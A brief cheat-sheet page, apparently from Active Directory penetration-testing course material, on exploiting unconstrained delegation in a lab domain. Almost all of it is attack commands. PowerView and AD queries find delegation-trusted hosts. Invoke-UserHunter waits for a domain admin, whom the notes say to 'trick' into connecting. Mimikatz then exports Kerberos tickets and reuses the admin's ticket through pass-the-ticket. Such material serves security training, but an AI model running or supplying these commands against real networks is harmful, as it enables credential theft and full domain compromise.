Unconstrained Delegation
Discover domain computers which have unconstrained delegation
PowerView:
Get-NetComputer -UnConstrained• Using ActiveDirectory module:Get-ADComputer -Filter {TrustedForDelegation -eq $True}Get-ADUser -Filter {TrustedForDelegation -eq $True}We must trick or wait for a domain admin to connect a service on appsrv. • Now, if the command is run again:Invoke-UserHunter -ComputerName dcorp-appsrv -Poll 100 -UserName Administrator -Delay 5 -VerboseInvoke-Mimikatz –Command '"sekurlsa::tickets /export"'• The DA token could be reused:Invoke-Mimikatz -Command '"kerberos::pttC:\Users\appadmin\Documents\user1\[0;2ceb8b3]-2-0-60a10000-Administrator@krbtgtDOLLARCORP.MONEYCORP.LOCAL.kirbi"'Last updated